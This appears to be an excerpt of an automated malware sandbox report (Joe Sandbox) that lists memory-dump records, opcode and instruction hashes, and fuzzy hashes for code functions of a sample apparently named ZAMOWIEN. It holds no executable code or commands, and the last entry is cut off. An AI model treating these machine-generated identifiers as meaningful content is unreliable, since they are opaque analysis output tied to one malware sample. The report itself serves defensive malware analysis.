                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ec4c851b86638fb58b58c43a71f38575ce0ccadf90e1c31b3cda9118d6c59b0e
                                                                            • Instruction ID: 5f441f53fffd7ce723dac8cb7a190660ade884cfc5e98fa4f35f7c12afa131f4
                                                                            • Opcode Fuzzy Hash: ec4c851b86638fb58b58c43a71f38575ce0ccadf90e1c31b3cda9118d6c59b0e
                                                                            • Instruction Fuzzy Hash: 39717979A00628AFDB15DF98C880BEEB7B5FF4A745F504015EC45AB260DB35EC42CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 47f43c0aa455de05722f6ec944d064e03f86b8df3c94a54d836e0097b37bf1d7
                                                                            • Instruction ID: 838e6314372591ce0e6aa1a33ff05c4fb28aa2ca9156524a2865c1d81d1c623f
                                                                            • Opcode Fuzzy Hash: 47f43c0aa455de05722f6ec944d064e03f86b8df3c94a54d836e0097b37bf1d7
                                                                            • Instruction Fuzzy Hash: D9814B75A00245DFDB09CF58C490AAEBBF1FF48304F1581ADD859AB355D734EA51CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 62890c3fcbc3c42c92c457d0b334e8facf4c3f5fcdc364464a54b0fd343bc699
                                                                            • Instruction ID: 829abcafb1a28b69d4a9e41ec39d1246c373cf39610315690d2713675f69b1ed
                                                                            • Opcode Fuzzy Hash: 62890c3fcbc3c42c92c457d0b334e8facf4c3f5fcdc364464a54b0fd343bc699
                                                                            • Instruction Fuzzy Hash: E061ADB9A00715AFDB15CF68C980B9BBBA9FF48754F00861DF86887340DB74A516CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5048e73c17f4e2a4ebcb6fadfb9d2c06b8c4d7ad7222cfcf2bc567586f104cf0
                                                                            • Instruction ID: fa57e2a736d4f1abf2e177ee81a2b78e8f9e016d3755c888ac70b9f333eb3628
                                                                            • Opcode Fuzzy Hash: 5048e73c17f4e2a4ebcb6fadfb9d2c06b8c4d7ad7222cfcf2bc567586f104cf0
                                                                            • Instruction Fuzzy Hash: 5C61D47D6047428FDB05CF68C894B5AB7E0BF84718F14846DE8A98B391DB75E806CF81
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 957ebac01b103ba72940ed3689f7f9a5053ee214ef888b505d2f72072d33970b
                                                                            • Instruction ID: 2112611b2df262782fbbc19e83c770d636973b562328ce3a551b2359571a1478
                                                                            • Opcode Fuzzy Hash: 957ebac01b103ba72940ed3689f7f9a5053ee214ef888b505d2f72072d33970b
                                                                            • Instruction Fuzzy Hash: 386168B9E01769AFEB05CF68C540B9DBBB0FF48724F118269E818AB351D774A941CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 792759015df524f8bd81cb41cf33e0305a2ebe10ade23d587f144f8b125e7679
                                                                            • Instruction ID: 5d7946ebf319260efa8def17ff569d89fd7eac72368b82f9bad89eec923da90c
                                                                            • Opcode Fuzzy Hash: 792759015df524f8bd81cb41cf33e0305a2ebe10ade23d587f144f8b125e7679
                                                                            • Instruction Fuzzy Hash: 0E414779242700EFD7168F19CC85B1A7BA9FF44754F11942AE96ADB290DBB0DC41CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                            • Instruction ID: bdb8bad01c4b7794a89091c6bdf25604db7b2e9d3cc4e307bfbbafc9badbecc4
                                                                            • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                            • Instruction Fuzzy Hash: B451D1BE6003069FDB019F648C40A7B77A6EF9878CF404429FA58E7251EB75C856C7E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c3408c4093c0ce8aac5b26eb3c3872fd6979f6fefab3f625d4facd792f107e01
                                                                            • Instruction ID: e8e59335fe44c12023c0af061366c173847c00b92cab11f9c4ded49114e360e3
                                                                            • Opcode Fuzzy Hash: c3408c4093c0ce8aac5b26eb3c3872fd6979f6fefab3f625d4facd792f107e01
                                                                            • Instruction Fuzzy Hash: 655106B91413509FE320DF28CD80F6A37A8EB84768F14062DEA25972D1DB74E841C7E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7d328385895b5c9833267c56a374e1e4b9eba1d29e45a0d9a3562732059d703f
                                                                            • Instruction ID: b33623b5fd84a449558fd44ab332c5e1263f1e99f07cc56eb48b25407d7d25b3
                                                                            • Opcode Fuzzy Hash: 7d328385895b5c9833267c56a374e1e4b9eba1d29e45a0d9a3562732059d703f
                                                                            • Instruction Fuzzy Hash: F8518C79900348AFFB228FA8CC81BDDBBB4EF01344F60442AE9A5A7191DBB19C45DB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d78a09bc32330bdb09a59af4105cfbc9a823f74121210d953b3cf9dcaac1f287
                                                                            • Instruction ID: f7d60b28182736cad67fce6cb3e44d0fac3a1e8ee6c343296985e7aae4863068
                                                                            • Opcode Fuzzy Hash: d78a09bc32330bdb09a59af4105cfbc9a823f74121210d953b3cf9dcaac1f287
                                                                            • Instruction Fuzzy Hash: AF51DCBDA1165ABFD311CF68C8807A9B7B0FF04710B1086A9E858DB740EB34E991CBC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                            • Instruction ID: 94cbe36e8f67a12732dffc81b2f1e67f19a2434c5a1db0b6c5508858fbf2bb44
                                                                            • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                            • Instruction Fuzzy Hash: 0F514B79608346AFDB04CF68C880B5ABBE5FF88348F04892DF99897351DB74E945CB52
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a8f57b728df8518abc9a7d1eac6105926034ab104463ddaa6b476cdc94f7b9d9
                                                                            • Instruction ID: da69d9492ea6248ec4ca9c9694381ee41b6b74fb59179a777dd12b6e0396e096
                                                                            • Opcode Fuzzy Hash: a8f57b728df8518abc9a7d1eac6105926034ab104463ddaa6b476cdc94f7b9d9
                                                                            • Instruction Fuzzy Hash: 01518CB9A09315EFEB11CEA8C840BDEB7B5BF08798F100519D815FB341DBB69940CB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e665a259c7a3eda1846407379a0f5f9071932505d215a8f44c36f088f629456b
                                                                            • Instruction ID: e1f5779bb7a637d299a3a5425838b3c9133ea742b4b4f46d0703e2d2cf8e8b2f
                                                                            • Opcode Fuzzy Hash: e665a259c7a3eda1846407379a0f5f9071932505d215a8f44c36f088f629456b
                                                                            • Instruction Fuzzy Hash: 5451CA7A604345DFE311CF18C880B9AB7E4FF88758F018529F8989B290DB74E945CB92
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f63d96fa3f2fd3a8264e310801a7c59cabf203bc0dbe56d2d9a352542066196a
                                                                            • Instruction ID: fac407f8bf9043e7cfe60c3d3077fb22905768d4dcb360b6dadd197d6ccb408b
                                                                            • Opcode Fuzzy Hash: f63d96fa3f2fd3a8264e310801a7c59cabf203bc0dbe56d2d9a352542066196a
                                                                            • Instruction Fuzzy Hash: 674186BED01769AFD7129BA88884AAF77BCAF04758F510166ED14F7200DA74DD40CBE1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                            • Instruction ID: be3d6b93c7611ceee22b6e2b5e3d9b7bea48a2fdeee05aa5df2678a68c982d2c
                                                                            • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                            • Instruction Fuzzy Hash: EF515EB920160AEFDB06CF54C580A56FBB5FF45344F1581BAE9089F222E771E946CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 839e67e78b157fae76c02169f270e9d53af48eab49682eec52d6f6288b3cefe2
                                                                            • Instruction ID: f83d4bdca3eaaa341bb9e265f449da18d23649ac9f1e278d9bd5c3e609c1517a
                                                                            • Opcode Fuzzy Hash: 839e67e78b157fae76c02169f270e9d53af48eab49682eec52d6f6288b3cefe2
                                                                            • Instruction Fuzzy Hash: 53517AB9604751DFE711CF29C980B5ABBF5FF88314F00892DE9998B250DB70E846CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 23aaa79e81e5c1f3854947ba02f2d4358e5ed803b2f5510b13edbd4f5c85ad26
                                                                            • Instruction ID: b8358fd9497329537252dedf523c1619ad8fa099f6083adf0758e066d0771c82
                                                                            • Opcode Fuzzy Hash: 23aaa79e81e5c1f3854947ba02f2d4358e5ed803b2f5510b13edbd4f5c85ad26
                                                                            • Instruction Fuzzy Hash: E151EC7A2087A1EFD712CB18C840B1A73E2BB44B98F5500A5F8289FB91DB79DC40CB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                            • Instruction ID: abc40e906d674b5460b157f2631d4fc9c31481307eefc5b10121bdd1c592c615
                                                                            • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                                            • Instruction Fuzzy Hash: 255107B9A00205DFDB08CF68C5816AABBF1FB48318F54856ED919A7345E734EA90CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bf6395760c08fb52215a5c8eced874e31cc4b0c9ef98ffac0f6f925813f1fd5d
                                                                            • Instruction ID: 2ad253795e295c69ce46ddfa4406c8defb9981984190bc73ba81610b01fc4f48
                                                                            • Opcode Fuzzy Hash: bf6395760c08fb52215a5c8eced874e31cc4b0c9ef98ffac0f6f925813f1fd5d
                                                                            • Instruction Fuzzy Hash: 2141E37E9097559FE331DF18C880B9BB7A8AB85764F110629EDA897280DB74DC04CBD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08f5d13287ef19c4b1a41f81f40922c7949fbb780217f0d1ebb2dcb932689cbd
                                                                            • Instruction ID: 81689e44e53e06f7aa90943da18cad702616598726b2aa4d95e5e710d014380d
                                                                            • Opcode Fuzzy Hash: 08f5d13287ef19c4b1a41f81f40922c7949fbb780217f0d1ebb2dcb932689cbd
                                                                            • Instruction Fuzzy Hash: BD41E17AA08316ABE324DF28CC40B9BB7A4BF44794F104929F8659B290DB70DC45CBE5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 922f047ee7d42e8fc709de5bf11f2d3c7e4653b087baf52635a0ebed0b9aefb3
                                                                            • Instruction ID: fadad705eb5ba4ea3cc21668ce7c44691d4bd6a64d659b9fa2ea948bc344ff0a
                                                                            • Opcode Fuzzy Hash: 922f047ee7d42e8fc709de5bf11f2d3c7e4653b087baf52635a0ebed0b9aefb3
                                                                            • Instruction Fuzzy Hash: 9F41B1B9642305EFE7159F69C884B1ABBEDFF00794F008429E565DB290DBB0D841CFA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca1ac5d55d692f5f46498b90b45fcbb1537f4f259a80e997c9e8bbffb511a4be
                                                                            • Instruction ID: a9bccf1402b2d494cb9b4a5ffdba7daa8f67153471ee92dd7ef192006cddd2df
                                                                            • Opcode Fuzzy Hash: ca1ac5d55d692f5f46498b90b45fcbb1537f4f259a80e997c9e8bbffb511a4be
                                                                            • Instruction Fuzzy Hash: 3A41BAB9A01B01AFD715CF6DC880B9AB7F5FF88744F00803DD55A976A0EB70E9018B90
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: da351c332cc1a734621a16f187582b7fcad7dbba5d16f25e4e9e39465d1424d6
                                                                            • Instruction ID: ce14bbb33c86d00e1b870caf2893fce50d8533bf7cd92387bf280672f83d8d01
                                                                            • Opcode Fuzzy Hash: da351c332cc1a734621a16f187582b7fcad7dbba5d16f25e4e9e39465d1424d6
                                                                            • Instruction Fuzzy Hash: 8541E1B9116310DFD321DF29C880F5A77A9EF95364F10092DE929972D0CB74E852CBD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3a0098d64843378da610105f93eb257d99676a7b702d2994faaaa906aaea376f
                                                                            • Instruction ID: 1c89959013b1e9641e5007786ead2c39f3c7efdaa7c78e63ea0c951fab9e0884
                                                                            • Opcode Fuzzy Hash: 3a0098d64843378da610105f93eb257d99676a7b702d2994faaaa906aaea376f
                                                                            • Instruction Fuzzy Hash: 0F41F27E600215EBEB15CF6DCC40BAB3768EF94794F5A4068ED259B290DB74DE01CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
                                                                            • Instruction ID: c9ef11dfe81bafb25fdf8bba74ea846f5105ccf266d510b144ffc641e27d98f1
                                                                            • Opcode Fuzzy Hash: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
